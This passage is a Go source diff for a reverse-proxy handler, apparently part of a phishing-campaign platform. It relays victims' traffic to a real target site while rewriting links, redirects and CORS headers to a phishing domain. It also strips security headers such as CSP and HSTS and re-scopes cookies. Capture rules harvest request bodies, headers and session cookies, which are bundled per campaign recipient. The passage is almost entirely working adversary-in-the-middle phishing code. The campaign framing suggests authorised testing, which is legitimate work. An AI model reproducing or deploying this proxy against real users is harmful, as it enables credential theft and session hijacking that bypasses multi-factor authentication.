+} + +// HandleHTTPRequest processes incoming http requests through the proxy +func (m *ProxyHandler) HandleHTTPRequest(w http.ResponseWriter, req *http.Request, domain *database.Domain) error { + ctx := req.Context() + + // initialize request context + reqCtx, err := m.initializeRequestContext(ctx, req, domain) + if err != nil { + return err + } + + // create http client + client, err := m.createHTTPClient(req, reqCtx.ProxyConfig) + if err != nil { + return errors.Errorf("failed to create proxy HTTP client: %w", err) + } + + // process request + modifiedReq, resp := m.processRequestWithContext(req, 
reqCtx) + if resp != nil { + return m.writeResponse(w, resp) + } + + // prepare request for target server + m.prepareRequestForTarget(modifiedReq, client) + + // execute request + targetResp, err := client.Do(modifiedReq) + if err != nil { + m.logger.Errorw("failed to execute proxied request", "error", err) + return fmt.Errorf("failed to execute request: %w", err) + } + defer targetResp.Body.Close() + + // process response + finalResp := m.processResponseWithContext(targetResp, reqCtx) + + // write final response + return m.writeResponse(w, finalResp) +} + +func (m *ProxyHandler) extractTargetDomain(domain *database.Domain) string { + targetDomain := domain.ProxyTargetDomain + if targetDomain == "" { + return "" + } + if strings.Contains(targetDomain, "://") { + if parsedURL, err := url.Parse(targetDomain); err == nil { + targetDomain = parsedURL.Host + } + } + return targetDomain +} + +func (m *ProxyHandler) createHTTPClient(req *http.Request, proxyConfig *service.ProxyServiceConfigYAML) (*http.Client, error) { + client := &http.Client{ + Timeout: 30 * time.Second, + Transport: &http.Transport{}, + } + + if proxyConfig.Proxy != "" { + proxyURL, err := url.Parse("http://" + proxyConfig.Proxy) + if err != nil { + return nil, err + } + client.Transport = &http.Transport{ + Proxy: http.ProxyURL(proxyURL), + TLSClientConfig: &tls.Config{ + InsecureSkipVerify: true, + }, + } + } + return client, nil +} + +// initializeRequestContext creates and populates the request context with all necessary data +func (m *ProxyHandler) initializeRequestContext(ctx context.Context, req *http.Request, domain *database.Domain) (*RequestContext, error) { + // setup proxy config + proxyEntry, err := m.ProxyRepository.GetByID(ctx, domain.ProxyID, &repository.ProxyOption{}) + if err != nil { + return nil, errors.Errorf("failed to fetch Proxy config: %w", err) + } + proxyConfig, err := m.parseProxyConfig(proxyEntry.ProxyConfig.MustGet().String()) + if err != nil { + return nil, 
// processRequestWithContext classifies the request — initial landing request
// (campaign recipient id present), request carrying an existing session
// cookie, or anonymous — and prepares it for forwarding. A non-nil
// *http.Response return short-circuits proxying and is written to the client.
func (m *ProxyHandler) processRequestWithContext(req *http.Request, reqCtx *RequestContext) (*http.Request, *http.Response) {
	// ensure scheme is set
	if req.URL.Scheme == "" {
		req.URL.Scheme = "https"
	}

	reqURL := req.URL.String()
	createSession := reqCtx.CampaignRecipientID != nil

	// handle existing session cleanup if this is an initial request
	if createSession {
		m.cleanupExistingSession(reqCtx.CampaignRecipientID, reqURL)
	} else {
		// check for existing session
		sessionCookie, err := req.Cookie(m.cookieName)
		if err == nil && m.isValidSessionCookie(sessionCookie.Value) {
			reqCtx.SessionID = sessionCookie.Value
		}
	}

	// handle requests without session: pass straight through to the target
	if reqCtx.SessionID == "" && !createSession {
		return m.prepareRequestWithoutSession(req, reqCtx.TargetDomain), nil
	}

	// get or create session and populate context
	err := m.resolveSessionContext(req, reqCtx, createSession)
	if err != nil {
		m.logger.Errorw("failed to resolve session context", "error", err)
		return req, m.createServiceUnavailableResponse("Service temporarily unavailable")
	}

	// apply session-based request processing
	return m.applySessionToRequestWithContext(req, reqCtx), nil
}

// cleanupExistingSession removes any previous session (and its
// campaign-recipient index entry) for a recipient who is landing again.
// The reqURL parameter is currently unused.
func (m *ProxyHandler) cleanupExistingSession(campaignRecipientID *uuid.UUID, reqURL string) {
	if existingSessionID := m.findSessionByCampaignRecipient(campaignRecipientID); existingSessionID != "" {
		m.sessions.Delete(existingSessionID)
		m.campaignRecipientSessions.Delete(campaignRecipientID.String())
	}
}
m.findSessionByCampaignRecipient(campaignRecipientID); existingSessionID != "" { + m.sessions.Delete(existingSessionID) + m.campaignRecipientSessions.Delete(campaignRecipientID.String()) + + } +} + +func (m *ProxyHandler) prepareRequestWithoutSession(req *http.Request, targetDomain string) *http.Request { + req.Host = targetDomain + req.URL.Host = targetDomain + req.URL.Scheme = "https" + + return req +} + +// resolveSessionContext gets or creates a session and populates the request context +func (m *ProxyHandler) resolveSessionContext(req *http.Request, reqCtx *RequestContext, createSession bool) error { + if createSession { + newSession, err := m.createNewSession(req, reqCtx.CampaignRecipientID, reqCtx.ProxyConfig, reqCtx.Domain, reqCtx.TargetDomain) + if err != nil { + return err + } + reqCtx.SessionID = newSession.ID + reqCtx.SessionCreated = true + reqCtx.Session = newSession + } else { + // load existing session + sessionVal, exists := m.sessions.Load(reqCtx.SessionID) + if !exists { + return fmt.Errorf("session not found") + } + session, ok := sessionVal.(*ProxySession) + if !ok { + return fmt.Errorf("invalid session type") + } + reqCtx.Session = session + } + + // populate config map once + reqCtx.ConfigMap = m.configToMap(&reqCtx.Session.Config) + return nil +} + +func (m *ProxyHandler) applySessionToRequestWithContext(req *http.Request, reqCtx *RequestContext) *http.Request { + // handle initial request with campaign recipient id + if reqCtx.CampaignRecipientID != nil { + req.Host = reqCtx.Session.TargetDomain + req.URL.Scheme = "https" + req.URL.Host = reqCtx.Session.TargetDomain + // remove campaign recipient id from query params + q := req.URL.Query() + q.Del(reqCtx.ParamName) + req.URL.RawQuery = q.Encode() + } else { + // for subsequent requests, map to original host + originalHost := m.replaceHostWithOriginal(req.Host, reqCtx.ConfigMap) + req.Host = originalHost + req.URL.Host = originalHost + } + + // apply request processing + 
m.processRequestWithSessionContext(req, reqCtx) + return req +} + +func (m *ProxyHandler) processRequestWithSessionContext(req *http.Request, reqCtx *RequestContext) { + // normalize headers + m.normalizeRequestHeaders(req, reqCtx.Session) + + // apply capture rules + m.onRequestBody(req, reqCtx.Session) + m.onRequestHeader(req, reqCtx.Session) + + // patch query parameters + m.patchQueryParametersWithContext(req, reqCtx) + + // patch request body + m.patchRequestBodyWithContext(req, reqCtx) +} + +func (m *ProxyHandler) patchQueryParametersWithContext(req *http.Request, reqCtx *RequestContext) { + qs := req.URL.Query() + if len(qs) == 0 { + return + } + + for param := range qs { + for i, value := range qs[param] { + qs[param][i] = string(m.patchUrls(reqCtx.ConfigMap, []byte(value), CONVERT_TO_ORIGINAL_URLS)) + } + } + req.URL.RawQuery = qs.Encode() +} + +func (m *ProxyHandler) patchRequestBodyWithContext(req *http.Request, reqCtx *RequestContext) { + if req.Body == nil { + return + } + + body, err := io.ReadAll(req.Body) + if err != nil { + m.logger.Errorw("failed to read request body for patching", "error", err) + return + } + req.Body.Close() + + body = m.patchUrls(reqCtx.ConfigMap, body, CONVERT_TO_ORIGINAL_URLS) + req.Body = io.NopCloser(bytes.NewBuffer(body)) + req.ContentLength = int64(len(body)) +} + +func (m *ProxyHandler) prepareRequestForTarget(req *http.Request, client *http.Client) { + req.RequestURI = "" + req.Header.Del("Accept-Encoding") + + // setup cookie jar for redirect handling + jar, _ := cookiejar.New(nil) + client.Jar = jar + client.CheckRedirect = func(req *http.Request, via []*http.Request) error { + return http.ErrUseLastResponse + } + + // remove proxy session cookie + m.removeProxyCookie(req) +} + +func (m *ProxyHandler) removeProxyCookie(req *http.Request) { + if req.Header.Get("Cookie") == "" { + return + } + + cookies := req.Cookies() + var filteredCookies []*http.Cookie + for _, cookie := range cookies { + if cookie.Name != 
// processResponseWithContext routes the upstream response through capture,
// cookie processing and rewriting. Capture runs BEFORE any rewriting so that
// captured values reflect what the real target sent.
func (m *ProxyHandler) processResponseWithContext(resp *http.Response, reqCtx *RequestContext) *http.Response {
	if resp == nil {
		return nil
	}

	// handle responses with or without session
	if reqCtx.SessionID != "" && reqCtx.Session != nil {
		// capture response data before any rewriting
		m.captureResponseDataWithContext(resp, reqCtx)

		// process cookies for phishing domain responses after capture
		if reqCtx.PhishDomain != "" {
			m.processCookiesForPhishingDomainWithContext(resp, reqCtx)
		}

		return m.processResponseWithSessionContext(resp, reqCtx)
	}

	// process cookies for phishing domain responses (no session case)
	if reqCtx.PhishDomain != "" {
		m.processCookiesForPhishingDomainWithContext(resp, reqCtx)
	}

	return m.processResponseWithoutSessionContext(resp, reqCtx)
}

// captureResponseDataWithContext runs capture rules against cookies, headers
// and (for text-like content types) the body, restoring the body for later
// rewriting stages.
func (m *ProxyHandler) captureResponseDataWithContext(resp *http.Response, reqCtx *RequestContext) {
	// capture cookies, headers, and body
	m.onResponseCookies(resp, reqCtx.Session)
	m.onResponseHeader(resp, reqCtx.Session)

	contentType := resp.Header.Get("Content-Type")
	if m.shouldProcessContent(contentType) {
		body, _, err := m.readAndDecompressBody(resp)
		if err == nil {
			m.onResponseBody(resp, body, reqCtx.Session)
			// put the (decompressed) body back so rewriting can read it again
			resp.Body = io.NopCloser(bytes.NewReader(body))
		}
	}
}

// processResponseWithSessionContext finishes a session-bound response: sets
// the session cookie for new sessions, honours campaign-flow redirects, and
// rewrites headers/body toward the phishing hosts.
func (m *ProxyHandler) processResponseWithSessionContext(resp *http.Response, reqCtx *RequestContext) *http.Response {
	// set session cookie for new sessions
	if reqCtx.SessionCreated {
		m.setSessionCookieWithContext(resp, reqCtx)
	}

	// check for campaign flow progression
	if m.shouldRedirectForCampaignFlow(reqCtx.Session, resp.Request) {
		if redirectResp := m.createCampaignFlowRedirect(reqCtx.Session, resp); redirectResp != nil {
			// a brand-new session must not lose its cookie on the redirect
			if reqCtx.SessionCreated {
				m.copyCookieToResponse(resp, redirectResp)
			}
			return redirectResp
		}
	}

	// apply response rewriting
	m.rewriteResponseHeadersWithContext(resp, reqCtx)
	m.rewriteResponseBodyWithContext(resp, reqCtx)

	return resp
}
m.copyCookieToResponse(resp, redirectResp) + } + return redirectResp + } + } + + // apply response rewriting + m.rewriteResponseHeadersWithContext(resp, reqCtx) + m.rewriteResponseBodyWithContext(resp, reqCtx) + + return resp +} + +func (m *ProxyHandler) setSessionCookieWithContext(resp *http.Response, reqCtx *RequestContext) { + cookie := &http.Cookie{ + Name: m.cookieName, + Value: reqCtx.SessionID, + Path: "/", + Domain: "." + reqCtx.PhishDomain, + Expires: time.Now().Add(time.Duration(PROXY_COOKIE_MAX_AGE) * time.Second), + HttpOnly: true, + Secure: true, + SameSite: http.SameSiteLaxMode, + } + resp.Header.Add("Set-Cookie", cookie.String()) +} + +func (m *ProxyHandler) copyCookieToResponse(sourceResp, targetResp *http.Response) { + if cookieHeader := sourceResp.Header.Get("Set-Cookie"); cookieHeader != "" { + targetResp.Header.Set("Set-Cookie", cookieHeader) + } +} + +func (m *ProxyHandler) rewriteResponseHeadersWithContext(resp *http.Response, reqCtx *RequestContext) { + // remove security headers + securityHeaders := []string{ + "Content-Security-Policy", + "Content-Security-Policy-Report-Only", + "Strict-Transport-Security", + "X-XSS-Protection", + "X-Content-Type-Options", + "X-Frame-Options", + } + for _, header := range securityHeaders { + resp.Header.Del(header) + } + + // fix cors headers + if allowOrigin := resp.Header.Get("Access-Control-Allow-Origin"); allowOrigin != "" && allowOrigin != "*" { + if oURL, err := url.Parse(allowOrigin); err == nil { + if phishHost := m.replaceHostWithPhished(oURL.Host, reqCtx.ConfigMap); phishHost != "" { + oURL.Host = phishHost + resp.Header.Set("Access-Control-Allow-Origin", oURL.String()) + } + } + resp.Header.Set("Access-Control-Allow-Credentials", "true") + } + + // fix location header + if location := resp.Header.Get("Location"); location != "" { + if rURL, err := url.Parse(location); err == nil { + if phishHost := m.replaceHostWithPhished(rURL.Host, reqCtx.ConfigMap); phishHost != "" { + rURL.Host = phishHost + 
// rewriteResponseBodyWithContext rewrites target URLs to phishing URLs in
// text-like bodies, applies the session's custom replacements, and disables
// caching of the rewritten content.
func (m *ProxyHandler) rewriteResponseBodyWithContext(resp *http.Response, reqCtx *RequestContext) {
	contentType := resp.Header.Get("Content-Type")
	if !m.shouldProcessContent(contentType) {
		return
	}

	defer resp.Body.Close()
	body, wasCompressed, err := m.readAndDecompressBody(resp)
	if err != nil {
		m.logger.Errorw("failed to read and decompress response body", "error", err)
		return
	}

	body = m.patchUrls(reqCtx.ConfigMap, body, CONVERT_TO_PHISHING_URLS)
	body = m.applyCustomReplacements(body, reqCtx.Session)

	m.updateResponseBody(resp, body, wasCompressed)
	resp.Header.Set("Cache-Control", "no-cache, no-store")
}

// processResponseWithoutSessionContext handles responses for requests that
// carry no session: a minimal host mapping is derived from the database (or
// a basic target->phish fallback) and used for basic rewriting.
func (m *ProxyHandler) processResponseWithoutSessionContext(resp *http.Response, reqCtx *RequestContext) *http.Response {
	// create minimal config for url rewriting
	config := m.createMinimalConfig(reqCtx.PhishDomain, reqCtx.TargetDomain)

	// apply basic response processing
	m.removeSecurityHeaders(resp)
	m.rewriteLocationHeaderWithoutSession(resp, config)
	m.rewriteResponseBodyWithoutSessionContext(resp, reqCtx, config)

	return resp
}

// processCookiesForPhishingDomainWithContext adjusts and re-domains every
// Set-Cookie header so cookies stick to the phishing domain.
// NOTE(review): reqCtx.Session may be nil on the session-less path; confirm
// adjustCookieSettings tolerates a nil session.
func (m *ProxyHandler) processCookiesForPhishingDomainWithContext(resp *http.Response, reqCtx *RequestContext) {
	cookies := resp.Cookies()
	if len(cookies) == 0 {
		return
	}

	tempConfig := map[string]service.ProxyServiceDomainConfig{
		reqCtx.TargetDomain: {To: reqCtx.PhishDomain},
	}

	// rebuild the Set-Cookie headers from the adjusted cookies
	resp.Header.Del("Set-Cookie")
	for _, ck := range cookies {
		m.adjustCookieSettings(ck, reqCtx.Session, resp)
		m.rewriteCookieDomain(ck, tempConfig, resp)
		resp.Header.Add("Set-Cookie", ck.String())
	}
}

// createMinimalConfig builds a host mapping for session-less traffic by
// looking the phishing domain up in the database and loading its proxy
// config; falls back to a single target->phish entry when nothing is found.
func (m *ProxyHandler) createMinimalConfig(phishDomain, targetDomain string) map[string]service.ProxyServiceDomainConfig {
	config := make(map[string]service.ProxyServiceDomainConfig)
	var fullConfigYAML *service.ProxyServiceConfigYAML

	dbDomain := &database.Domain{}
	if err := m.DomainRepository.DB.Where("name = ?", phishDomain).First(dbDomain).Error; err == nil {
		if dbDomain.ProxyID != nil {
			dbProxy := &database.Proxy{}
			if err := m.ProxyRepository.DB.Where("id = ?", *dbDomain.ProxyID).First(dbProxy).Error; err == nil {
				if configYAML, err := m.parseProxyConfig(dbProxy.ProxyConfig); err == nil {
					fullConfigYAML = configYAML
					for host, hostConfig := range fullConfigYAML.Hosts {
						if hostConfig != nil {
							config[host] = *hostConfig
						}
					}
				}
			}
		}
	}

	// fallback to basic mapping
	if len(config) == 0 {
		config[targetDomain] = service.ProxyServiceDomainConfig{To: phishDomain}
	}

	// add global rules to all host configurations
	if fullConfigYAML != nil && fullConfigYAML.Global != nil {
		for originalHost := range config {
			hostConfig := config[originalHost]
			// append global capture rules
			hostConfig.Capture = append(hostConfig.Capture, fullConfigYAML.Global.Capture...)
			// append global rewrite rules
			hostConfig.Rewrite = append(hostConfig.Rewrite, fullConfigYAML.Global.Rewrite...)
			config[originalHost] = hostConfig
		}
	}

	return config
}
+ config[originalHost] = hostConfig + } + } + + return config +} + +func (m *ProxyHandler) removeSecurityHeaders(resp *http.Response) { + headers := []string{ + "Content-Security-Policy", + "Content-Security-Policy-Report-Only", + "Strict-Transport-Security", + "X-XSS-Protection", + "X-Content-Type-Options", + "X-Frame-Options", + } + for _, header := range headers { + resp.Header.Del(header) + } +} + +func (m *ProxyHandler) rewriteLocationHeaderWithoutSession(resp *http.Response, config map[string]service.ProxyServiceDomainConfig) { + location := resp.Header.Get("Location") + if location == "" { + return + } + + if rURL, err := url.Parse(location); err == nil { + if phishHost := m.replaceHostWithPhished(rURL.Host, config); phishHost != "" { + rURL.Host = phishHost + resp.Header.Set("Location", rURL.String()) + } + } +} + +func (m *ProxyHandler) rewriteResponseBodyWithoutSessionContext(resp *http.Response, reqCtx *RequestContext, config map[string]service.ProxyServiceDomainConfig) { + contentType := resp.Header.Get("Content-Type") + if !m.shouldProcessContent(contentType) { + return + } + + defer resp.Body.Close() + body, wasCompressed, err := m.readAndDecompressBody(resp) + if err != nil { + m.logger.Errorw("failed to read and decompress response body", "error", err) + return + } + + body = m.patchUrls(config, body, CONVERT_TO_PHISHING_URLS) + body = m.applyCustomReplacementsWithoutSession(body, config, reqCtx.TargetDomain) + + m.updateResponseBody(resp, body, wasCompressed) + if m.shouldCacheControlContent(contentType) { + resp.Header.Set("Cache-Control", "no-cache, no-store") + } +} + +func (m *ProxyHandler) shouldCacheControlContent(contentType string) bool { + return strings.Contains(contentType, "text/html") || + strings.Contains(contentType, "javascript") || + strings.Contains(contentType, "application/json") +} + +func (m *ProxyHandler) patchUrls(config map[string]service.ProxyServiceDomainConfig, body []byte, convertType int) []byte { + hostMap, hosts := 
m.buildHostMapping(config, convertType) + + // sort hosts by length (longest first) to avoid partial replacements + sort.Slice(hosts, func(i, j int) bool { + return len(hosts[i]) > len(hosts[j]) + }) + + // first pass: urls with schemes + body = m.replaceURLsWithScheme(body, hosts, hostMap) + + // second pass: urls without schemes + body = m.replaceURLsWithoutScheme(body, hosts, hostMap) + + return body +} + +func (m *ProxyHandler) buildHostMapping(config map[string]service.ProxyServiceDomainConfig, convertType int) (map[string]string, []string) { + hostMap := make(map[string]string) + var hosts []string + + for originalHost, hostConfig := range config { + if hostConfig.To == "" { + continue + } + + var from, to string + if convertType == CONVERT_TO_ORIGINAL_URLS { + from = hostConfig.To + to = originalHost + } else { + from = originalHost + to = hostConfig.To + } + + hostMap[strings.ToLower(from)] = to + hosts = append(hosts, strings.ToLower(from)) + } + + return hostMap, hosts +} + +func (m *ProxyHandler) replaceURLsWithScheme(body []byte, hosts []string, hostMap map[string]string) []byte { + return []byte(MATCH_URL_REGEXP.ReplaceAllStringFunc(string(body), func(sURL string) string { + u, err := url.Parse(sURL) + if err != nil { + return sURL + } + + for _, h := range hosts { + if strings.ToLower(u.Host) == h { + return strings.Replace(sURL, u.Host, hostMap[h], 1) + } + } + return sURL + })) +} + +func (m *ProxyHandler) replaceURLsWithoutScheme(body []byte, hosts []string, hostMap map[string]string) []byte { + return []byte(MATCH_URL_REGEXP_WITHOUT_SCHEME.ReplaceAllStringFunc(string(body), func(sURL string) string { + for _, h := range hosts { + if strings.Contains(sURL, h) && !strings.Contains(sURL, hostMap[h]) { + return strings.Replace(sURL, h, hostMap[h], 1) + } + } + return sURL + })) +} + +func (m *ProxyHandler) replaceHostWithOriginal(hostname string, config map[string]service.ProxyServiceDomainConfig) string { + for originalHost, hostConfig := range 
config { + if strings.EqualFold(hostConfig.To, hostname) { + return originalHost + } + } + return "" +} + +func (m *ProxyHandler) replaceHostWithPhished(hostname string, config map[string]service.ProxyServiceDomainConfig) string { + for originalHost, hostConfig := range config { + if strings.EqualFold(originalHost, hostname) { + return hostConfig.To + } + + // check for subdomain mapping + if strings.HasSuffix(strings.ToLower(hostname), "."+strings.ToLower(originalHost)) { + subdomain := strings.TrimSuffix(hostname, "."+originalHost) + if subdomain != "" { + return subdomain + "." + hostConfig.To + } + return hostConfig.To + } + } + return "" +} + +func (m *ProxyHandler) createNewSession( + req *http.Request, + campaignRecipientID *uuid.UUID, + proxyConfig *service.ProxyServiceConfigYAML, + domain *database.Domain, + targetDomain string, +) (*ProxySession, error) { + ctx := req.Context() + + // get campaign information + campaign, recipientID, campaignID, err := m.getCampaignInfo(ctx, campaignRecipientID) + if err != nil { + return nil, err + } + + // create session configuration + sessionConfig := m.buildSessionConfig(targetDomain, domain.Name, proxyConfig) + + // create session + session := &ProxySession{ + ID: uuid.New().String(), + CampaignRecipientID: campaignRecipientID, + CampaignID: campaignID, + RecipientID: recipientID, + Campaign: campaign, + Domain: domain, + TargetDomain: targetDomain, + CreatedAt: time.Now(), + } + + // initialize session data + m.initializeSession(session, sessionConfig) + + // store session + m.sessions.Store(session.ID, session) + if campaignRecipientID != nil { + m.campaignRecipientSessions.Store(campaignRecipientID.String(), session.ID) + } + + return session, nil +} + +func (m *ProxyHandler) getCampaignInfo(ctx context.Context, campaignRecipientID *uuid.UUID) (*model.Campaign, *uuid.UUID, *uuid.UUID, error) { + cRecipient, err := m.CampaignRecipientRepository.GetByID(ctx, campaignRecipientID, 
&repository.CampaignRecipientOption{}) + if err != nil { + return nil, nil, nil, fmt.Errorf("invalid campaign recipient ID %s: %w", campaignRecipientID.String(), err) + } + + recipientID, err := cRecipient.RecipientID.Get() + if err != nil { + return nil, nil, nil, fmt.Errorf("campaign recipient %s has no recipient ID: %w", campaignRecipientID.String(), err) + } + + campaignID, err := cRecipient.CampaignID.Get() + if err != nil { + return nil, nil, nil, fmt.Errorf("campaign recipient %s has no campaign ID: %w", campaignRecipientID.String(), err) + } + + campaign, err := m.CampaignRepository.GetByID(ctx, &campaignID, &repository.CampaignOption{ + WithCampaignTemplate: true, + }) + if err != nil { + return nil, nil, nil, fmt.Errorf("failed to get campaign %s: %w", campaignID.String(), err) + } + + return campaign, &recipientID, &campaignID, nil +} + +func (m *ProxyHandler) buildSessionConfig(targetDomain, phishDomain string, proxyConfig *service.ProxyServiceConfigYAML) map[string]service.ProxyServiceDomainConfig { + sessionConfig := map[string]service.ProxyServiceDomainConfig{ + targetDomain: {To: phishDomain}, + } + + // Copy domain-specific proxy config + for originalHost, hostConfig := range proxyConfig.Hosts { + if hostConfig != nil { + sessionConfig[originalHost] = *hostConfig + } + } + + // add global rules to all host configurations + if proxyConfig.Global != nil { + for originalHost := range sessionConfig { + hostConfig := sessionConfig[originalHost] + // append global capture rules + hostConfig.Capture = append(hostConfig.Capture, proxyConfig.Global.Capture...) + // append global rewrite rules + hostConfig.Rewrite = append(hostConfig.Rewrite, proxyConfig.Global.Rewrite...) 
+ sessionConfig[originalHost] = hostConfig + } + } + + return sessionConfig +} + +func (m *ProxyHandler) initializeSession(session *ProxySession, sessionConfig map[string]service.ProxyServiceDomainConfig) { + // store configuration in sync.map + for host, config := range sessionConfig { + session.Config.Store(host, config) + } + + // initialize atomic values + session.IsComplete.Store(false) + session.CookieBundleSubmitted.Store(false) + session.NextPageType.Store("") + + // initialize required captures + m.initializeRequiredCaptures(session) +} + +func (m *ProxyHandler) findSessionByCampaignRecipient(campaignRecipientID *uuid.UUID) string { + if campaignRecipientID == nil { + return "" + } + + sessionIDVal, exists := m.campaignRecipientSessions.Load(campaignRecipientID.String()) + if !exists { + return "" + } + + sessionID := sessionIDVal.(string) + if sessionVal, sessionExists := m.sessions.Load(sessionID); sessionExists { + if _, ok := sessionVal.(*ProxySession); ok { + return sessionID + } + } + + // cleanup orphaned mapping + m.campaignRecipientSessions.Delete(campaignRecipientID.String()) + return "" +} + +func (m *ProxyHandler) initializeRequiredCaptures(session *ProxySession) { + session.Config.Range(func(key, value interface{}) bool { + hostConfig := value.(service.ProxyServiceDomainConfig) + for _, capture := range hostConfig.Capture { + if capture.Required == nil || *capture.Required { + session.RequiredCaptures.Store(capture.Name, false) + } + } + return true + }) +} + +func (m *ProxyHandler) onRequestBody(req *http.Request, session *ProxySession) { + hostConfigInterface, exists := session.Config.Load(req.Host) + if !exists || req.Body == nil { + return + } + + hostConfig := hostConfigInterface.(service.ProxyServiceDomainConfig) + body := m.readRequestBody(req) + + for _, capture := range hostConfig.Capture { + if m.shouldApplyCaptureRule(capture, "request_body", req) { + m.captureFromText(string(body), capture, session, req, "request_body") + } + } + + 
// onRequestHeader applies request-header capture rules against a textual dump
// of the request headers.
func (m *ProxyHandler) onRequestHeader(req *http.Request, session *ProxySession) {
	hostConfigInterface, exists := session.Config.Load(req.Host)
	if !exists {
		return
	}

	hostConfig := hostConfigInterface.(service.ProxyServiceDomainConfig)
	var buf bytes.Buffer
	req.Header.Write(&buf)

	for _, capture := range hostConfig.Capture {
		if m.shouldApplyCaptureRule(capture, "request_header", req) {
			m.captureFromText(buf.String(), capture, session, req, "request_header")
		}
	}
}

// onResponseBody applies response-body capture rules; rules without a Find
// pattern are treated as navigation (path-based) captures.
func (m *ProxyHandler) onResponseBody(resp *http.Response, body []byte, session *ProxySession) {
	// requests re-hosted earlier carry the original host; fall back to the
	// session's target domain when the request host is empty
	originalHost := resp.Request.Host
	if originalHost == "" {
		originalHost = session.TargetDomain
	}

	hostConfigInterface, exists := session.Config.Load(originalHost)
	if !exists {
		return
	}

	hostConfig := hostConfigInterface.(service.ProxyServiceDomainConfig)

	for _, capture := range hostConfig.Capture {
		if m.shouldProcessResponseBodyCapture(capture, resp.Request) {
			if capture.Find == "" {
				m.handlePathBasedCapture(capture, session, resp)
			} else {
				m.captureFromText(string(body), capture, session, resp.Request, "response_body")
			}
		}
	}
}

// onResponseCookies applies cookie capture rules against the response's
// Set-Cookie headers and drives campaign flow / cookie-bundle submission.
func (m *ProxyHandler) onResponseCookies(resp *http.Response, session *ProxySession) {
	hostConfigInterface, exists := session.Config.Load(resp.Request.Host)
	if !exists {
		return
	}

	hostConfig := hostConfigInterface.(service.ProxyServiceDomainConfig)
	cookies := resp.Cookies()
	if len(cookies) == 0 {
		return
	}

	capturedCookies := make(map[string]map[string]string)

	for _, capture := range hostConfig.Capture {
		if capture.From == "cookie" && m.matchesPath(capture, resp.Request) {
			if cookieData := m.extractCookieData(capture, cookies, resp); cookieData != nil {
				capturedCookies[capture.Name] = cookieData
				// always overwrite cookie data to ensure we have the latest cookies
				// this is important for scenarios like failed login -> successful login
				session.CapturedData.Store(capture.Name, cookieData)
				m.checkCaptureCompletion(session, capture.Name)
				// reset cookie bundle submitted flag since we have new cookie data
				// this allows resubmission with the latest cookies after all captures complete
				session.CookieBundleSubmitted.Store(false)
			}
		}
	}

	if len(capturedCookies) > 0 {
		m.handleCampaignFlowProgression(session, resp.Request)
	}

	m.checkAndSubmitCookieBundleWhenComplete(session, resp.Request)
}
login + session.CapturedData.Store(capture.Name, cookieData) + m.checkCaptureCompletion(session, capture.Name) + // reset cookie bundle submitted flag since we have new cookie data + // this allows resubmission with the latest cookies after all captures complete + session.CookieBundleSubmitted.Store(false) + } + } + } + + if len(capturedCookies) > 0 { + m.handleCampaignFlowProgression(session, resp.Request) + } + + m.checkAndSubmitCookieBundleWhenComplete(session, resp.Request) +} + +func (m *ProxyHandler) onResponseHeader(resp *http.Response, session *ProxySession) { + hostConfigInterface, exists := session.Config.Load(resp.Request.Host) + if !exists { + return + } + + hostConfig := hostConfigInterface.(service.ProxyServiceDomainConfig) + var buf bytes.Buffer + resp.Header.Write(&buf) + + for _, capture := range hostConfig.Capture { + if m.shouldApplyCaptureRule(capture, "response_header", resp.Request) { + m.captureFromText(buf.String(), capture, session, resp.Request, "response_header") + m.handleImmediateCampaignRedirect(session, resp, resp.Request, "response_header") + } + } +} + +func (m *ProxyHandler) shouldApplyCaptureRule(capture service.ProxyServiceCaptureRule, captureType string, req *http.Request) bool { + // check capture source + if capture.From != "" && capture.From != captureType && capture.From != "any" { + return false + } + + // check method + if capture.Method != "" && capture.Method != req.Method { + return false + } + + // check path + return m.matchesPath(capture, req) +} + +func (m *ProxyHandler) shouldProcessResponseBodyCapture(capture service.ProxyServiceCaptureRule, req *http.Request) bool { + // handle path-based captures + if capture.Path != "" && (capture.Method == "" || capture.Method == req.Method) { + return m.matchesPath(capture, req) + } + + // handle regular response body captures + return m.shouldApplyCaptureRule(capture, "response_body", req) +} + +func (m *ProxyHandler) matchesPath(capture service.ProxyServiceCaptureRule, req 
*http.Request) bool { + if capture.PathRe == nil { + return true + } + return capture.PathRe.MatchString(req.URL.Path) +} + +func (m *ProxyHandler) handlePathBasedCapture(capture service.ProxyServiceCaptureRule, session *ProxySession, resp *http.Response) { + // only mark as complete if path AND method match exactly + methodMatches := capture.Method == "" || capture.Method == resp.Request.Method + pathMatches := m.matchesPath(capture, resp.Request) + + if methodMatches && pathMatches { + // store captured data before marking complete + capturedData := map[string]string{ + "navigation_path": resp.Request.URL.Path, + "capture_type": "navigation", + } + session.CapturedData.Store(capture.Name, capturedData) + m.checkCaptureCompletion(session, capture.Name) + + if session.CampaignRecipientID != nil && session.CampaignID != nil { + m.createCampaignSubmitEvent(session, capturedData, resp.Request) + } + + // check if cookie bundle should be submitted now that this capture is complete + m.checkAndSubmitCookieBundleWhenComplete(session, resp.Request) + } + + m.handleImmediateCampaignRedirect(session, resp, resp.Request, "path_navigation") +} + +func (m *ProxyHandler) extractCookieData(capture service.ProxyServiceCaptureRule, cookies []*http.Cookie, resp *http.Response) map[string]string { + cookieName := capture.Find + if cookieName == "" { + return nil + } + + for _, cookie := range cookies { + if cookie.Name == cookieName { + return m.buildCookieData(cookie, resp) + } + } + return nil +} + +func (m *ProxyHandler) buildCookieData(cookie *http.Cookie, resp *http.Response) map[string]string { + cookieDomain := cookie.Domain + if cookieDomain == "" { + cookieDomain = resp.Request.Host + } + + isSecure := cookie.Secure + if resp.Request.URL.Scheme == "https" && !isSecure { + isSecure = true + } + + cookieData := map[string]string{ + "name": cookie.Name, + "value": cookie.Value, + "domain": cookieDomain, + "path": cookie.Path, + "capture_time": time.Now().Format(time.RFC3339), 
